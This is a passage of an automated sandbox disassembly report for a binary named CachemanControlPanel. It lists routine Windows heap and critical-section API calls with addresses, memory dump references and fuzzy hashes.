                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 830345296-0
                                                        • Opcode ID: ef83a424be5230a86b39ecc6d34ebf564b0a5d0e71246dd9aa724a29f9ee61ed
                                                        • Instruction ID: 23705f2559c574ce396f17cbada3c18a4d1e591e9be55e5c4d69a412d2f82599
                                                        • Opcode Fuzzy Hash: ef83a424be5230a86b39ecc6d34ebf564b0a5d0e71246dd9aa724a29f9ee61ed
                                                        • Instruction Fuzzy Hash: AE510371604B069FC728CF29D580962FBF4FF487503158A2EE89A87A10D735F996CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • wcslen.MSVCRT ref: 0040C25A
                                                        • HeapAlloc.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,?,0040C036,?,?,00000000), ref: 0040C270
                                                        • wcscpy.MSVCRT ref: 0040C27B
                                                        • memset.MSVCRT ref: 0040C2A9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocHeapmemsetwcscpywcslen
                                                        • String ID:
                                                        • API String ID: 1807340688-0
                                                        • Opcode ID: ec33e3908c6c771793e816267602e7e2e7672a70ad24028b13a2c1f0b4c416dc
                                                        • Instruction ID: 58c5f6168ff7a60003f67b2cd0c4914594f31e853226de6b5d99fba91dbbf87e
                                                        • Opcode Fuzzy Hash: ec33e3908c6c771793e816267602e7e2e7672a70ad24028b13a2c1f0b4c416dc
                                                        • Instruction Fuzzy Hash: F821F476500700EFC3219FA5D881B27B7E4EF89318F144A3FF58562A91CB39A805CB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040C068: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,0040BF2A,?), ref: 0040C093
                                                          • Part of subcall function 0040C068: HeapFree.KERNEL32(00000000,?,?,?,0040BF2A,?), ref: 0040C09F
                                                          • Part of subcall function 0040C068: HeapFree.KERNEL32(00000000,?,?,?,?,0040BF2A,?), ref: 0040C0B3
                                                          • Part of subcall function 0040C068: HeapFree.KERNEL32(00000000,?,?,?,0040BF2A,?), ref: 0040C0C9
                                                        • HeapAlloc.KERNEL32(00000000,0000003C,?), ref: 0040BF3A
                                                        • HeapAlloc.KERNEL32(00000008,?), ref: 0040BF60
                                                        • HeapAlloc.KERNEL32(00000008,?,?,00000010,00010000,00000004,?), ref: 0040BFBD
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0040BFD7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 3901518246-0
                                                        • Opcode ID: 90ed4249fb475afdad791bcb49ba754730ae4c8223294c0f93cfd3c01d989e2c
                                                        • Instruction ID: 34ba8a4f319ab73104d89e8476fde803eb39aca07ad07745b6ca894eb89de08d
                                                        • Opcode Fuzzy Hash: 90ed4249fb475afdad791bcb49ba754730ae4c8223294c0f93cfd3c01d989e2c
                                                        • Instruction Fuzzy Hash: 48215772600612BBD7149F2ADC01B06BBE4FB48B11F40822AF508E7A90C7B1E861CFDC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00001020,00000000,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E), ref: 00417E1E
                                                        • HeapReAlloc.KERNEL32(00000008,?,?,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000), ref: 00417E5E
                                                        • LeaveCriticalSection.KERNEL32(00001020,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8), ref: 00417E99
                                                          • Part of subcall function 004184ED: HeapAlloc.KERNEL32(00000008,00000000,00417D67,00434120,00000014,?,?,?,?,00416161,00000078,00000000,00416140,?,0040105D,00000000), ref: 004184F9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 830345296-0
                                                        • Opcode ID: dd34c7134b2f3baa6c34e33b9ce0de47b92842a7f9949afb813079d0ee80df53
                                                        • Instruction ID: 676c71ca03bd6d7b500d677f7790eac57bfd58da78af71c9cb47e2531e497145
                                                        • Opcode Fuzzy Hash: dd34c7134b2f3baa6c34e33b9ce0de47b92842a7f9949afb813079d0ee80df53
                                                        • Instruction Fuzzy Hash: 8B115832208711AFC7249F28EC80E56B7F9EB48321B04892AF496D36A0D734FC80CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040C0D1: memset.MSVCRT ref: 0040C139
                                                          • Part of subcall function 004182C1: EnterCriticalSection.KERNEL32(00434134,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?), ref: 004182D5
                                                          • Part of subcall function 004182C1: HeapFree.KERNEL32(00000000,?,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?), ref: 00418323
                                                          • Part of subcall function 004182C1: LeaveCriticalSection.KERNEL32(00434134,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?,00000000), ref: 0041832A
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,0040BF2A,?), ref: 0040C093
                                                        • HeapFree.KERNEL32(00000000,?,?,?,0040BF2A,?), ref: 0040C09F
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,0040BF2A,?), ref: 0040C0B3
                                                        • HeapFree.KERNEL32(00000000,?,?,?,0040BF2A,?), ref: 0040C0C9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                        • String ID:
                                                        • API String ID: 4254243056-0
                                                        • Opcode ID: f261dfb08539aeb4de2043b4239043ae99f607715914f62d8fdbfc996957e3cf
                                                        • Instruction ID: bb1b9e47252b3d7416027ea759061f43e2fc256de630eea5c341f22563d4a6da
                                                        • Opcode Fuzzy Hash: f261dfb08539aeb4de2043b4239043ae99f607715914f62d8fdbfc996957e3cf
                                                        • Instruction Fuzzy Hash: 08F03132101505FFDA11AF56DD80C17BBFDFF49765341112AB40492530C733AC61DAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%